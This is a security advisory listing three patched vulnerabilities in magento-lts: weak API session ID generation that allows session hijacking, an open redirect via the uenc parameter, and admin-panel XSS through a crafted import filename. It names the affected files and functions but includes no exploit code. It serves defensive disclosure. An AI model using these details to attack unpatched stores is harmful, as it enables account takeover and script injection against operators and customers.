SB2026050512 - Multiple vulnerabilities in magento-lts

CSH
CYBERSECURITY HELP
Sign In REGISTER

Main Vulnerability Database SB2026050512

SB2026050512 - Multiple vulnerabilities in magento-lts

Published: May 5, 2026

Security Bulletin ID SB2026050512
CSH Severity
High
Patch available
YES
Number of vulnerabilities 3
Exploitation vector Remote access
Highest impact Code execution

Breakdown by Severity

High 33% Medium 33% Low 33%
  • Low
  • Medium
  • High
  • Critical

Description

This security bulletin contains information about 3 vulnerabilities.


1) Use of insufficiently random values (CVE-ID: CVE-2026-42155)

CWE-ID: CWE-330 - Use of Insufficiently Random Values

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:U/U:Amber


The vulnerability allows a remote attacker to hijack active API sessions and gain the capabilities of the authenticated API user.

The vulnerability exists due to use of insufficiently random values in API session ID generation in Mage/Api/Model/Session.php start() when handling API login requests. A remote attacker can generate candidate session identifiers and send crafted API requests to hijack active API sessions and gain the capabilities of the authenticated API user.

The issue affects legacy API surfaces that share the same session generation logic, including XML-RPC, SOAP v1, SOAP v2, and legacy REST.


2) Open redirect (CVE-ID: CVE-2026-42207)

CWE-ID: CWE-601 - URL Redirection to Untrusted Site ('Open Redirect')

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/U:Green


The vulnerability allows a remote attacker to redirect users to an arbitrary external URL.

The vulnerability exists due to url redirection to untrusted site in Mage_ProductAlert_AddController::stockAction() when handling the uenc query parameter for requests with a non-existent product_id. A remote attacker can send a specially crafted link to redirect users to an arbitrary external URL.

User interaction is required, and the redirect occurs only after the customer is authenticated and the supplied product_id does not match an existing catalog product.


3) Improper Neutralization of Alternate XSS Syntax (CVE-ID: CVE-2026-42458)

CWE-ID: CWE-87 - Improper Neutralization of Alternate XSS Syntax

CVSSv4: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/U:Clear


The vulnerability allows a remote user to execute arbitrary script in the administrator's browser.

The vulnerability exists due to improper neutralization of alternate XSS syntax in the Import -> Data Flow (profiles) run functionality when rendering a user-controlled filename in the run profile page. A remote user can upload or reference a specially crafted filename to execute arbitrary script in the administrator's browser.

The issue is reachable in the admin panel during Import profile execution.


Remediation

Install update from vendor's website.

References